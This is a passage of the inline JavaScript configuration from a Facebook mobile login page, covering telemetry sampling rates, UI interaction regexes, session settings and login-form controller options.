660 "on_demand_profiling_counters": true,
661 "default_rate": 1000,
662 "lite_default_rate": 100,
663 "interaction_to_lite_coinflip": {
664 "ADS_INTERFACES_INTERACTION": 0,
665 "ads_perf_scenario": 0,
666 "ads_wait_time": 0,
667 "Event": 10,
668 "video_psr": 0,
669 "video_stall": 0
670 },
671 "interaction_to_coinflip": {
672 "ADS_INTERFACES_INTERACTION": 1,
673 "ads_perf_scenario": 1,
674 "ads_wait_time": 1,
675 "video_psr": 1000000,
676 "video_stall": 2500000,
677 "Event": 500,
678 "watch_carousel_left_scroll": 1,
679 "watch_carousel_right_scroll": 1,
680 "watch_sections_load_more": 1,
681 "watch_discover_scroll": 1,
682 "fbpkg_ui": 1,
683 "sevmanager_powersearch_initial_page_load": 10,
684 "backbone_ui": 1
685 },
686 "enable_heartbeat": true,
687 "maxBlockMergeDuration": 0,
688 "maxBlockMergeDistance": 0,
689 "enable_banzai_stream": true,
690 "user_timing_coinflip": 50,
691 "banzai_stream_coinflip": 1,
692 "compression_enabled": true,
693 "ref_counting_fix": true,
694 "ref_counting_cont_fix": false,
695 "also_record_new_timeslice_format": false,
696 "force_async_request_tracing_on": false
697 }, 2609],
698 ["FWLoader", [], {}, 278],
699 ["MPageControllerGating", [], {
700 "shouldDeferUntilCertainNoRedirect": false
701 }, 2023],
702 ["CoreWarningGK", [], {
703 "forceWarning": false
704 }, 725],
705 ["BigPipeExperiments", [], {
706 "link_images_to_pagelets": false
707 }, 907],
708 ["SessionNameConfig", [], {
709 "seed": "0BOX"
710 }, 757],
711 ["ErrorSignalConfig", [], {
712 "uri": "https:\/\/error.facebook.com\/common\/scribe_endpoint.php"
713 }, 319],
714 ["ArtilleryComponentSaverOptions", [], {
715 "options": {
716 "ads_wait_time_saver": {
717 "shouldCompress": false,
718 "shouldUploadSeparately": false
719 },
720 "ads_flux_profiler_saver": {
721 "shouldCompress": true,
722 "shouldUploadSeparately": false
723 },
724 "timeslice_execution_saver": {
725 "shouldCompress": true,
726 "shouldUploadSeparately": false
727 },
728 "interaction_async_request_join_data": {
729 "shouldCompress": true,
730 "shouldUploadSeparately": true
731 },
732 "resources_saver": {
733 "shouldCompress": true,
734 "shouldUploadSeparately": false
735 },
736 "user_timing_saver": {
737 "shouldCompress": false,
738 "shouldUploadSeparately": false
739 }
740 }
741 }, 3016],
742 ["MRenderingSchedulerConfig", [], {
743 "delayNormalResources": false,
744 "isDisplayJSEnabled": false
745 }, 1978],
746 ["EventConfig", [], {
747 "sampling": {
748 "bandwidth": 0,
749 "play": 0,
750 "playing": 0,
751 "progress": 0,
752 "pause": 0,
753 "ended": 0,
754 "seeked": 0,
755 "seeking": 0,
756 "waiting": 0,
757 "loadedmetadata": 0,
758 "canplay": 0,
759 "selectionchange": 0,
760 "change": 0,
761 "timeupdate": 2000000,
762 "adaptation": 0,
763 "focus": 0,
764 "blur": 0,
765 "load": 0,
766 "error": 0,
767 "message": 0,
768 "abort": 0,
769 "storage": 0,
770 "scroll": 200000,
771 "mousemove": 20000,
772 "mouseover": 10000,
773 "mouseout": 10000,
774 "mousewheel": 1,
775 "MSPointerMove": 10000,
776 "keydown": 0.1,
777 "click": 0.02,
778 "mouseup": 0.02,
779 "__100ms": 0.001,
780 "__default": 5000,
781 "__min": 100,
782 "__interactionDefault": 200,
783 "__eventDefault": 100000
784 },
785 "page_sampling_boost": 1,
786 "interaction_regexes": {
787 "BlueBarAccountChevronMenu": " _5lxs(?: .*)?$",
788 "BlueBarHomeButton": " _bluebarLinkHome__interaction-root(?: .*)?$",
789 "BlueBarProfileLink": " _1k67(?: .*)?$",
790 "ReactComposerSproutMedia": " _1pnt(?: .*)?$",
791 "ReactComposerSproutAlbum": " _1pnu(?: .*)?$",
792 "ReactComposerSproutNote": " _3-9x(?: .*)?$",
793 "ReactComposerSproutLocation": " _1pnv(?: .*)?$",
794 "ReactComposerSproutActivity": " _1pnz(?: .*)?$",
795 "ReactComposerSproutPeople": " _1pn-(?: .*)?$",
796 "ReactComposerSproutLiveVideo": " _5tv7(?: .*)?$",
797 "ReactComposerSproutMarkdown": " _311p(?: .*)?$",
798 "ReactComposerSproutFormattedText": " _mwg(?: .*)?$",
799 "ReactComposerSproutSticker": " _2vri(?: .*)?$",
800 "ReactComposerSproutSponsor": " _5t5q(?: .*)?$",
801 "ReactComposerSproutEllipsis": " _1gr3(?: .*)?$",
802 "ReactComposerSproutContactYourRepresentative": " _3cnv(?: .*)?$",
803 "ReactComposerSproutFunFact": " _2_xs(?: .*)?$",
804 "TextExposeSeeMoreLink": " see_more_link(?: .*)?$",
805 "SnowliftBigCloseButton": "(?: _xlt(?: .*)? _418x(?: .*)?$| _418x(?: .*)? _xlt(?: .*)?$)",
806 "SnowliftPrevPager": "(?: snowliftPager(?: .*)? prev(?: .*)?$| prev(?: .*)? snowliftPager(?: .*)?$)",
807 "SnowliftNextPager": "(?: snowliftPager(?: .*)? next(?: .*)?$| next(?: .*)? snowliftPager(?: .*)?$)",
808 "SnowliftFullScreenButton": "#fbPhotoSnowliftFullScreenSwitch( .+)*",
809 "PrivacySelectorMenu": "(?: _57di(?: .*)? _2wli(?: .*)?$| _2wli(?: .*)? _57di(?: .*)?$)",
810 "ReactComposerFeedXSprouts": " _nh6(?: .*)?$",
811 "SproutsComposerStatusTab": " _sg1(?: .*)?$",
812 "SproutsComposerLiveVideoTab": " _sg1(?: .*)?$",
813 "SproutsComposerAlbumTab": " _sg1(?: .*)?$",
814 "composerAudienceSelector": " _ej0(?: .*)?$",
815 "FeedHScrollAttachmentsPrevPager": " _1qqy(?: .*)?$",
816 "FeedHScrollAttachmentsNextPager": " _1qqz(?: .*)?$",
817 "DockChatTabFlyout": " fbDockChatTabFlyout(?: .*)?$",
818 "PrivacyLiteJewel": " _59fc(?: .*)?$",
819 "ActorSelector": " _6vh(?: .*)?$",
820 "LegacyMentionsInput": "(?: ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)? _2xwx(?: .*)?$| uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)?$| _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)?$| ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)? uiMentionsInput(?: .*)?$| uiMentionsInput(?: .*)? _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)?$| _2xwx(?: .*)? uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)?$)",
821 "UFIActionLinksEmbedLink": " _2g1w(?: .*)?$",
822 "UFIPhotoAttachLink": " UFIPhotoAttachLinkWrapper(?: .*)?$",
823 "UFIMentionsInputProxy": " _1osa(?: .*)?$",
824 "UFIMentionsInputDummy": " _1osc(?: .*)?$",
825 "UFIOrderingModeSelector": " _3scp(?: .*)?$",
826 "UFIPager": "(?: UFIPagerRow(?: .*)? UFIRow(?: .*)?$| UFIRow(?: .*)? UFIPagerRow(?: .*)?$)",
827 "UFIReplyRow": "(?: UFIReplyRow(?: .*)? UFICommentReply(?: .*)?$| UFICommentReply(?: .*)? UFIReplyRow(?: .*)?$)",
828 "UFIReplySocialSentence": " UFIReplySocialSentenceRow(?: .*)?$",
829 "UFIShareLink": " _5f9b(?: .*)?$",
830 "UFIStickerButton": " UFICommentStickerButton(?: .*)?$",
831 "MentionsInput": " _5yk1(?: .*)?$",
832 "FantaChatTabRoot": " _3_9e(?: .*)?$",
833 "SnowliftViewableRoot": " _2-sx(?: .*)?$",
834 "ReactBlueBarJewelButton": " _5fwr(?: .*)?$",
835 "UFIReactionsDialogLayerImpl": " _1oxk(?: .*)?$",
836 "UFIReactionsLikeLinkImpl": " _4x9_(?: .*)?$",
837 "UFIReactionsLinkImplRoot": " _khz(?: .*)?$",
838 "Reaction": " _iuw(?: .*)?$",
839 "UFIReactionsMenuImpl": " _iu-(?: .*)?$",
840 "UFIReactionsSpatialReactionIconContainer": " _1fq9(?: .*)?$",
841 "VideoComponentPlayButton": " _bsl(?: .*)?$",
842 "FeedOptionsPopover": " _b1e(?: .*)?$",
843 "UFICommentLikeCount": " UFICommentLikeButton(?: .*)?$",
844 "UFICommentLink": " _5yxe(?: .*)?$",
845 "ChatTabComposerInputContainer": " _552h(?: .*)?$",
846 "ChatTabHeader": " _15p4(?: .*)?$",
847 "DraftEditor": " _5rp7(?: .*)?$",
848 "ChatSideBarDropDown": " _5vm9(?: .*)?$",
849 "SearchBox": " _539-(?: .*)?$",
850 "ChatSideBarLink": " _55ln(?: .*)?$",
851 "MessengerSearchTypeahead": " _3rh8(?: .*)?$",
852 "NotificationListItem": " _33c(?: .*)?$",
853 "MessageJewelListItem": " messagesContent(?: .*)?$",
854 "Messages_Jewel_Button": " _3eo8(?: .*)?$",
855 "Notifications_Jewel_Button": " _3eo9(?: .*)?$",
856 "snowliftopen": " _342u(?: .*)?$",
857 "NoteTextSeeMoreLink": " _3qd_(?: .*)?$",
858 "fbFeedOptionsPopover": " _1he6(?: .*)?$",
859 "Requests_Jewel_Button": " _3eoa(?: .*)?$",
860 "UFICommentActionLinkAjaxify": " _15-3(?: .*)?$",
861 "UFICommentActionLinkRedirect": " _15-6(?: .*)?$",
862 "UFICommentActionLinkDispatched": " _15-7(?: .*)?$",
863 "UFICommentCloseButton": " _36rj(?: .*)?$",
864 "UFICommentActionsRemovePreview": " _460h(?: .*)?$",
865 "UFICommentActionsReply": " _460i(?: .*)?$",
866 "UFICommentActionsSaleItemMessage": " _460j(?: .*)?$",
867 "UFICommentActionsAcceptAnswer": " _460k(?: .*)?$",
868 "UFICommentActionsUnacceptAnswer": " _460l(?: .*)?$",
869 "UFICommentReactionsLikeLink": " _3-me(?: .*)?$",
870 "UFICommentMenu": " _1-be(?: .*)?$",
871 "UFIMentionsInputFallback": " _289b(?: .*)?$",
872 "UFIMentionsInputComponent": " _289c(?: .*)?$",
873 "UFIMentionsInputProxyInput": " _432z(?: .*)?$",
874 "UFIMentionsInputProxyDummy": " _432-(?: .*)?$",
875 "UFIPrivateReplyLinkMessage": " _14hj(?: .*)?$",
876 "UFIPrivateReplyLinkSeeReply": " _14hk(?: .*)?$",
877 "ChatCloseButton": " _4vu4(?: .*)?$",
878 "ChatTabComposerPhotoUploader": " _13f-(?: .*)?$",
879 "ChatTabComposerGroupPollingButton": " _13f_(?: .*)?$",
880 "ChatTabComposerGames": " _13ga(?: .*)?$",
881 "ChatTabComposerPlan": " _13gb(?: .*)?$",
882 "ChatTabComposerFileUploader": " _13gd(?: .*)?$",
883 "ChatTabStickersButton": " _13ge(?: .*)?$",
884 "ChatTabComposerGifButton": " _13gf(?: .*)?$",
885 "ChatTabComposerEmojiPicker": " _13gg(?: .*)?$",
886 "ChatTabComposerLikeButton": " _13gi(?: .*)?$",
887 "ChatTabComposerP2PButton": " _13gj(?: .*)?$",
888 "ChatTabComposerQuickCam": " _13gk(?: .*)?$",
889 "ChatTabHeaderAudioRTCButton": " _461a(?: .*)?$",
890 "ChatTabHeaderVideoRTCButton": " _461b(?: .*)?$",
891 "ChatTabHeaderOptionsButton": " _461_(?: .*)?$",
892 "ChatTabHeaderAddToThreadButton": " _4620(?: .*)?$",
893 "ReactComposerMediaSprout": " _fk5(?: .*)?$",
894 "UFIReactionsBlingSocialSentenceComments": " _-56(?: .*)?$",
895 "UFIReactionsBlingSocialSentenceSeens": " _2x0l(?: .*)?$",
896 "UFIReactionsBlingSocialSentenceShares": " _2x0m(?: .*)?$",
897 "UFIReactionsBlingSocialSentenceViews": " _-5c(?: .*)?$",
898 "UFIReactionsBlingSocialSentence": " _-5d(?: .*)?$",
899 "UFIReactionsSocialSentence": " _1vaq(?: .*)?$",
900 "VideoFullscreenButton": " _39ip(?: .*)?$",
901 "Tahoe": " _400z(?: .*)?$",
902 "TahoeFromVideoPlayer": " _1vek(?: .*)?$",
903 "TahoeFromVideoLink": " _2-40(?: .*)?$",
904 "TahoeFromPhoto": " _2ju5(?: .*)?$",
905 "FBStoryTrayItem": " _1fvw(?: .*)?$",
906 "Mobile_Feed_Jewel_Button": "#feed_jewel( .+)*",
907 "Mobile_Requests_Jewel_Button": "#requests_jewel( .+)*",
908 "Mobile_Messages_Jewel_Button": "#messages_jewel( .+)*",
909 "Mobile_Notifications_Jewel_Button": "#notifications_jewel( .+)*",
910 "Mobile_Search_Jewel_Button": "#search_jewel( .+)*",
911 "Mobile_Bookmarks_Jewel_Button": "#bookmarks_jewel( .+)*",
912 "Mobile_Feed_UFI_Comment_Button_Permalink": " _l-a(?: .*)?$",
913 "Mobile_Feed_UFI_Comment_Button_Flyout": " _4qeq(?: .*)?$",
914 "Mobile_Feed_UFI_Token_Bar_Flyout": " _4qer(?: .*)?$",
915 "Mobile_Feed_UFI_Token_Bar_Permalink": " _4-09(?: .*)?$",
916 "Mobile_UFI_Share_Button": " _15kr(?: .*)?$",
917 "Mobile_Feed_Photo_Permalink": " _1mh-(?: .*)?$",
918 "Mobile_Feed_Video_Permalink": " _65g_(?: .*)?$",
919 "Mobile_Feed_Profile_Permalink": " _4kk6(?: .*)?$",
920 "Mobile_Feed_Story_Permalink": " _26yo(?: .*)?$",
921 "Mobile_Feed_Page_Permalink": " _4e81(?: .*)?$",
922 "Mobile_Feed_Group_Permalink": " _20u1(?: .*)?$",
923 "Mobile_Feed_Event_Permalink": " _20u0(?: .*)?$",
924 "ProfileIntroCardAddFeaturedMedia": " _30qr(?: .*)?$",
925 "ProfileSectionAbout": " _Interaction__ProfileSectionAbout(?: .*)?$",
926 "ProfileSectionAllRelationships": " _Interaction__ProfileSectionAllRelationships(?: .*)?$",
927 "ProfileSectionAtWork": " _2fnv(?: .*)?$",
928 "ProfileSectionContactBasic": " _Interaction__ProfileSectionContactBasic(?: .*)?$",
929 "ProfileSectionEducation": " _Interaction__ProfileSectionEducation(?: .*)?$",
930 "ProfileSectionOverview": " _Interaction__ProfileSectionOverview(?: .*)?$",
931 "ProfileSectionPlaces": " _Interaction__ProfileSectionPlaces(?: .*)?$",
932 "ProfileSectionYearOverviews": " _Interaction__ProfileSectionYearOverviews(?: .*)?$",
933 "IntlPolyglotHomepage": " _Interaction__IntlPolyglotVoteActivityCardButton(?: .*)?$",
934 "ProtonElementSelection": " _67ft(?: .*)?$"
935 },
936 "interaction_boost": {
937 "SnowliftPrevPager": 0.2,
938 "SnowliftNextPager": 0.2,
939 "ChatSideBarLink": 2,
940 "MessengerSearchTypeahead": 2,
941 "Messages_Jewel_Button": 2.5,
942 "Notifications_Jewel_Button": 1.5,
943 "Tahoe": 30,
944 "ProtonElementSelection": 4
945 },
946 "event_types": {
947 "BlueBarAccountChevronMenu": ["click"],
948 "BlueBarHomeButton": ["click"],
949 "BlueBarProfileLink": ["click"],
950 "ReactComposerSproutMedia": ["click"],
951 "ReactComposerSproutAlbum": ["click"],
952 "ReactComposerSproutNote": ["click"],
953 "ReactComposerSproutLocation": ["click"],
954 "ReactComposerSproutActivity": ["click"],
955 "ReactComposerSproutPeople": ["click"],
956 "ReactComposerSproutLiveVideo": ["click"],
957 "ReactComposerSproutMarkdown": ["click"],
958 "ReactComposerSproutFormattedText": ["click"],
959 "ReactComposerSproutSticker": ["click"],
960 "ReactComposerSproutSponsor": ["click"],
961 "ReactComposerSproutEllipsis": ["click"],
962 "ReactComposerSproutContactYourRepresentative": ["click"],
963 "ReactComposerSproutFunFact": ["click"],
964 "TextExposeSeeMoreLink": ["click"],
965 "SnowliftBigCloseButton": ["click"],
966 "SnowliftPrevPager": ["click"],
967 "SnowliftNextPager": ["click"],
968 "SnowliftFullScreenButton": ["click"],
969 "PrivacySelectorMenu": ["click"],
970 "ReactComposerFeedXSprouts": ["click"],
971 "SproutsComposerStatusTab": ["click"],
972 "SproutsComposerLiveVideoTab": ["click"],
973 "SproutsComposerAlbumTab": ["click"],
974 "composerAudienceSelector": ["click"],
975 "FeedHScrollAttachmentsPrevPager": ["click"],
976 "FeedHScrollAttachmentsNextPager": ["click"],
977 "DockChatTabFlyout": ["click"],
978 "PrivacyLiteJewel": ["click"],
979 "ActorSelector": ["click"],
980 "LegacyMentionsInput": ["click"],
981 "UFIActionLinksEmbedLink": ["click"],
982 "UFIPhotoAttachLink": ["click"],
983 "UFIMentionsInputProxy": ["click"],
984 "UFIMentionsInputDummy": ["click"],
985 "UFIOrderingModeSelector": ["click"],
986 "UFIPager": ["click"],
987 "UFIReplyRow": ["click"],
988 "UFIReplySocialSentence": ["click"],
989 "UFIShareLink": ["click"],
990 "UFIStickerButton": ["click"],
991 "MentionsInput": ["click"],
992 "FantaChatTabRoot": ["click"],
993 "SnowliftViewableRoot": ["click"],
994 "ReactBlueBarJewelButton": ["click"],
995 "UFIReactionsDialogLayerImpl": ["click"],
996 "UFIReactionsLikeLinkImpl": ["click"],
997 "UFIReactionsLinkImplRoot": ["click"],
998 "Reaction": ["click"],
999 "UFIReactionsMenuImpl": ["click"],
1000 "UFIReactionsSpatialReactionIconContainer": ["click"],
1001 "VideoComponentPlayButton": ["click"],
1002 "FeedOptionsPopover": ["click"],
1003 "UFICommentLikeCount": ["click"],
1004 "UFICommentLink": ["click"],
1005 "ChatTabComposerInputContainer": ["click"],
1006 "ChatTabHeader": ["click"],
1007 "DraftEditor": ["click"],
1008 "ChatSideBarDropDown": ["click"],
1009 "SearchBox": ["click"],
1010 "ChatSideBarLink": ["mouseup"],
1011 "MessengerSearchTypeahead": ["click"],
1012 "NotificationListItem": ["click"],
1013 "MessageJewelListItem": ["click"],
1014 "Messages_Jewel_Button": ["click"],
1015 "Notifications_Jewel_Button": ["click"],
1016 "snowliftopen": ["click"],
1017 "NoteTextSeeMoreLink": ["click"],
1018 "fbFeedOptionsPopover": ["click"],
1019 "Requests_Jewel_Button": ["click"],
1020 "UFICommentActionLinkAjaxify": ["click"],
1021 "UFICommentActionLinkRedirect": ["click"],
1022 "UFICommentActionLinkDispatched": ["click"],
1023 "UFICommentCloseButton": ["click"],
1024 "UFICommentActionsRemovePreview": ["click"],
1025 "UFICommentActionsReply": ["click"],
1026 "UFICommentActionsSaleItemMessage": ["click"],
1027 "UFICommentActionsAcceptAnswer": ["click"],
1028 "UFICommentActionsUnacceptAnswer": ["click"],
1029 "UFICommentReactionsLikeLink": ["click"],
1030 "UFICommentMenu": ["click"],
1031 "UFIMentionsInputFallback": ["click"],
1032 "UFIMentionsInputComponent": ["click"],
1033 "UFIMentionsInputProxyInput": ["click"],
1034 "UFIMentionsInputProxyDummy": ["click"],
1035 "UFIPrivateReplyLinkMessage": ["click"],
1036 "UFIPrivateReplyLinkSeeReply": ["click"],
1037 "ChatCloseButton": ["click"],
1038 "ChatTabComposerPhotoUploader": ["click"],
1039 "ChatTabComposerGroupPollingButton": ["click"],
1040 "ChatTabComposerGames": ["click"],
1041 "ChatTabComposerPlan": ["click"],
1042 "ChatTabComposerFileUploader": ["click"],
1043 "ChatTabStickersButton": ["click"],
1044 "ChatTabComposerGifButton": ["click"],
1045 "ChatTabComposerEmojiPicker": ["click"],
1046 "ChatTabComposerLikeButton": ["click"],
1047 "ChatTabComposerP2PButton": ["click"],
1048 "ChatTabComposerQuickCam": ["click"],
1049 "ChatTabHeaderAudioRTCButton": ["click"],
1050 "ChatTabHeaderVideoRTCButton": ["click"],
1051 "ChatTabHeaderOptionsButton": ["click"],
1052 "ChatTabHeaderAddToThreadButton": ["click"],
1053 "ReactComposerMediaSprout": ["click"],
1054 "UFIReactionsBlingSocialSentenceComments": ["click"],
1055 "UFIReactionsBlingSocialSentenceSeens": ["click"],
1056 "UFIReactionsBlingSocialSentenceShares": ["click"],
1057 "UFIReactionsBlingSocialSentenceViews": ["click"],
1058 "UFIReactionsBlingSocialSentence": ["click"],
1059 "UFIReactionsSocialSentence": ["click"],
1060 "VideoFullscreenButton": ["click"],
1061 "Tahoe": ["click"],
1062 "TahoeFromVideoPlayer": ["click"],
1063 "TahoeFromVideoLink": ["click"],
1064 "TahoeFromPhoto": ["click"],
1065 "": ["click"],
1066 "FBStoryTrayItem": ["click"],
1067 "Mobile_Feed_Jewel_Button": ["click"],
1068 "Mobile_Requests_Jewel_Button": ["click"],
1069 "Mobile_Messages_Jewel_Button": ["click"],
1070 "Mobile_Notifications_Jewel_Button": ["click"],
1071 "Mobile_Search_Jewel_Button": ["click"],
1072 "Mobile_Bookmarks_Jewel_Button": ["click"],
1073 "Mobile_Feed_UFI_Comment_Button_Permalink": ["click"],
1074 "Mobile_Feed_UFI_Comment_Button_Flyout": ["click"],
1075 "Mobile_Feed_UFI_Token_Bar_Flyout": ["click"],
1076 "Mobile_Feed_UFI_Token_Bar_Permalink": ["click"],
1077 "Mobile_UFI_Share_Button": ["click"],
1078 "Mobile_Feed_Photo_Permalink": ["click"],
1079 "Mobile_Feed_Video_Permalink": ["click"],
1080 "Mobile_Feed_Profile_Permalink": ["click"],
1081 "Mobile_Feed_Story_Permalink": ["click"],
1082 "Mobile_Feed_Page_Permalink": ["click"],
1083 "Mobile_Feed_Group_Permalink": ["click"],
1084 "Mobile_Feed_Event_Permalink": ["click"],
1085 "ProfileIntroCardAddFeaturedMedia": ["click"],
1086 "ProfileSectionAbout": ["click"],
1087 "ProfileSectionAllRelationships": ["click"],
1088 "ProfileSectionAtWork": ["click"],
1089 "ProfileSectionContactBasic": ["click"],
1090 "ProfileSectionEducation": ["click"],
1091 "ProfileSectionOverview": ["click"],
1092 "ProfileSectionPlaces": ["click"],
1093 "ProfileSectionYearOverviews": ["click"],
1094 "IntlPolyglotHomepage": ["click"],
1095 "ProtonElementSelection": ["click"]
1096 },
1097 "manual_instrumentation": false,
1098 "profile_eager_execution": true,
1099 "disable_heuristic": true,
1100 "disable_event_profiler": false
1101 }, 1726],
1102 ["KillabyteProfilerConfig", [], {
1103 "htmlProfilerModule": null,
1104 "profilerModule": null,
1105 "depTypes": {
1106 "BL": "bl",
1107 "NON_BL": "non-bl"
1108 }
1109 }, 1145],
1110 ["QuicklingConfig", [], {
1111 "version": "4176677;0;",
1112 "sessionLength": 30,
1113 "inactivePageRegex": "^\/(fr\/u\\.php|ads\/|advertising|ac\\.php|ae\\.php|a\\.php|ajax\/emu\/(end|f|h)\\.php|badges\/|comments\\.php|connect\/uiserver\\.php|editalbum\\.php.+add=1|ext\/|feeds\/|help([\/?]|$)|identity_switch\\.php|isconnectivityahumanright\/|intern\/|login\\.php|logout\\.php|sitetour\/homepage_tour\\.php|sorry\\.php|syndication\\.php|webmessenger|\/plugins\/subscribe|lookback|brandpermissions|gameday|pxlcld|comet|worldcup\/map|livemap|work\/admin|([^\/]+\/)?dialog)|legal|\\.pdf$",
1114 "badRequestKeys": ["nonce", "access_token", "oauth_token", "xs", "checkpoint_data", "code"],
1115 "logRefreshOverhead": false
1116 }, 60],
1117 ["MarauderConfig", [], {
1118 "app_version": "4176677",
1119 "gk_enabled": false
1120 }, 31],
1121 ["ImmediateActiveSecondsConfig", [], {
1122 "sampling_rate": 0
1123 }, 423],
1124 ["FbtQTOverrides", [], {
1125 "overrides": {
1126 "1_31ef5e45d0eb1091e469446c7e1919fe": "Click on your gender"
1127 }
1128 }, 551],
1129 ["MBanzaiConfig", [], {
1130 "EXPIRY": 86400000,
1131 "MAX_SIZE": 10000,
1132 "MAX_WAIT": 30000,
1133 "RESTORE_WAIT": 30000,
1134 "gks": {
1135 "boosted_component": true,
1136 "mchannel_jumpstart": true,
1137 "platform_oauth_client_events": true,
1138 "visibility_tracking": true,
1139 "xtrackable_clientview_batch": true,
1140 "boosted_pagelikes": true,
1141 "gqls_web_logging": true
1142 },
1143 "blacklist": ["time_spent"]
1144 }, 32],
1145 ["MSession", [], {
1146 "useAngora": false,
1147 "logoutURL": "\/logout.php?h=Afc_XqZK5RqwJ1oJ&t=1533409830",
1148 "push_phase": "C3"
1149 }, 52]
1150 ]);
1151 new(require("ServerJS"))().handle({});
1152 }, "ServerJS define", {
1153 "root": true
1154 })();
1155 require("MCoreInit").init({
1156 "clearMCache": false,
1157 "deferredResources": ["PdbpW", "\/O\/AZ", "uyJZ4", "FEt5G"],
1158 "hideLocationBar": true,
1159 "onafterload": "window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\"t_paint\");;if (window.ExitTime){CavalryLogger.getInstance(\"6585945071258867252-0\").setValue(\"t_exit\", window.ExitTime);};",
1160 "onload": "CavalryLogger.getInstance(\"6585945071258867252-0\").setTTIEvent(\"t_domcontent\");",
1161 "serverJSData": {
1162 "elements": [
1163 ["__elem_de5177dd_0_0", "u_0_0", 1],
1164 ["__elem_921b58ef_0_0", "login_form", 1],
1165 ["__elem_7216e2ae_0_0", "email_input_container", 1],
1166 ["__elem_e24cb174_0_0", "m_login_password", 1],
1167 ["__elem_7216e2ae_0_3", "u_0_1", 1],
1168 ["__elem_e03291d5_0_1", "u_0_2", 1],
1169 ["__elem_e03291d5_0_0", "u_0_3", 1],
1170 ["__elem_2df5b073_0_0", "did-you-forget-your-password-link", 1],
1171 ["__elem_7216e2ae_0_1", "u_0_4", 1],
1172 ["__elem_be66b106_0_0", "u_0_5", 1],
1173 ["__elem_7216e2ae_0_2", "u_0_6", 1],
1174 ["__elem_e980dec4_0_0", "signup-button", 1],
1175 ["__elem_8a020238_0_0", "forgot-password-link", 1],
1176 ["__elem_49f6b607_0_0", "root", 1],
1177 ["__elem_eed16c0a_0_0", "u_0_7", 1],
1178 ["__elem_a588f507_0_0", "u_0_8", 1],
1179 ["__elem_a588f507_0_1", "u_0_9", 1],
1180 ["__elem_0cdc66ad_0_0", "u_0_b", 1],
1181 ["__elem_0cdc66ad_0_1", "u_0_c", 1]
1182 ],
1183 "require": [
1184 ["BrowserPrefillLogging", "initContactpointFieldLogging", [],
1185 [{
1186 "contactpointFieldID": "m_login_email",
1187 "serverPrefill": ""
1188 }]
1189 ],
1190 ["MLoginController", "initClearCPCross", ["__elem_7216e2ae_0_0"],
1191 [{
1192 "root": {
1193 "__m": "__elem_7216e2ae_0_0"
1194 }
1195 }]
1196 ],
1197 ["MLoginController", "initIncorrectPWErrorMsgLink", ["__elem_2df5b073_0_0"],
1198 [{
1199 "root": {
1200 "__m": "__elem_2df5b073_0_0"
1201 }
1202 }]
1203 ],
1204 ["BrowserPrefillLogging", "initPasswordFieldLogging", [],
1205 [{
1206 "passwordFieldID": "m_login_password"
1207 }]
1208 ],
1209 ["MLoginView", "disableOnSubmit", ["__elem_921b58ef_0_0", "__elem_7216e2ae_0_1"],
1210 [{
1211 "__m": "__elem_921b58ef_0_0"
1212 }, {
1213 "__m": "__elem_7216e2ae_0_1"
1214 }]
1215 ],
1216 ["MLoginController", "initRegButton", ["__elem_7216e2ae_0_2"],
1217 [{
1218 "root": {
1219 "__m": "__elem_7216e2ae_0_2"
1220 },
1221 "regURI": "\/reg\/?cid=103",
1222 "useRegToLogin": true
1223 }]
1224 ],
1225 ["MLoginController", "initForgotAccountLink", ["__elem_8a020238_0_0"],
1226 [{
1227 "root": {
1228 "__m": "__elem_8a020238_0_0"
1229 }
1230 }]
1231 ],
1232 ["MLoginController", "initLoginForm", ["__elem_de5177dd_0_0"],
1233 [{
1234 "root": {
1235 "__m": "__elem_de5177dd_0_0"
1236 },
1237 "ajaxURI": "https:\/\/m.facebook.com\/login\/async\/?refsrc=https\u00253A\u00252F\u00252Fm.facebook.com\u00252Flogin.php&lwv=100",
1238 "rapidFeedbackUri": null,
1239 "clearOnDelete": false,
1240 "listenKeyDown": false,
1241 "isTwoStepsLogin": false,
1242 "passwordStepDelayMilliSeconds": 1000,
1243 "isActionLoggingEnabled": true,
1244 "isEarlyCPCheckEnabled": false,
1245 "onErrorRegURI": "\/r.php",
1246 "shouldNotAutoFocusPasswordField": false,
1247 "shouldAutoLandOnStep2": false,
1248 "shouldClearPasswordIfPrefilledCPChanged": true,
1249 "shouldEnableOneStepLoginForPrefill": false,
1250 "shouldAutoSubmitWhenPrefilledStep1": false,
1251 "shouldAutoSubmitWhenPrefilledStep2": false,
1252 "shouldEnableOneStepLoginOnStepTwo": false,
1253 "shouldClearPasswordIfOnlyPasswordPrefilled": true,
1254 "shouldRenderBoxedProfilePicDesign": true,
1255 "shouldShowProfilePicWithCP": false,
1256 "shouldEnableOneTimePassword": true,
1257 "shouldEnableScrollToError": false,
1258 "shouldEnableInlineError": false,
1259 "shouldEnableEditableCPDesign": true,
1260 "shouldCallServerOnEmptyCP": false,
1261 "isWithSafariFix": true,
1262 "shouldEnableOTPWithoutRedirection": false,
1263 "shouldPrefillHeaderJio": false,
1264 "shouldShowBlankCPPWErrorMsgWithLink": false,
1265 "shouldShowBlankCPPWErrorMsgNoLink": false,
1266 "shouldShowBlankPWValidCPErrorMsg": false,
1267 "shouldShowBlankPWValidCPErrorMsgNonAccurateExposure": false,
1268 "shouldSeparateIncorrectPWCTAFromErrorMSG": false
1269 }]
1270 ],
1271 ["MPasswordPlainTextToggle", "init", ["__elem_e24cb174_0_0", "__elem_7216e2ae_0_3", "__elem_e03291d5_0_0", "__elem_e03291d5_0_1"],
1272 [{
1273 "__m": "__elem_e24cb174_0_0"
1274 }, {
1275 "__m": "__elem_7216e2ae_0_3"
1276 }, {
1277 "__m": "__elem_e03291d5_0_0"
1278 }, {
1279 "__m": "__elem_e03291d5_0_1"
1280 }]
1281 ],
1282 ["ServiceWorkerLoginAndLogoutListener", "listen", ["__elem_be66b106_0_0"],
1283 [{
1284 "__m": "__elem_be66b106_0_0"
1285 }, "login", "\/sw?s=push", 612424062191227]
1286 ],
1287 ["MTouchable"],
1288 ["MBlockingTouchable", "init", ["__elem_e980dec4_0_0"],
1289 [{
1290 "__m": "__elem_e980dec4_0_0"
1291 }]
1292 ],
1293 ["AccessibilityWebVirtualCursorClickLogger", "init", ["__elem_49f6b607_0_0"],
1294 [
1295 [{
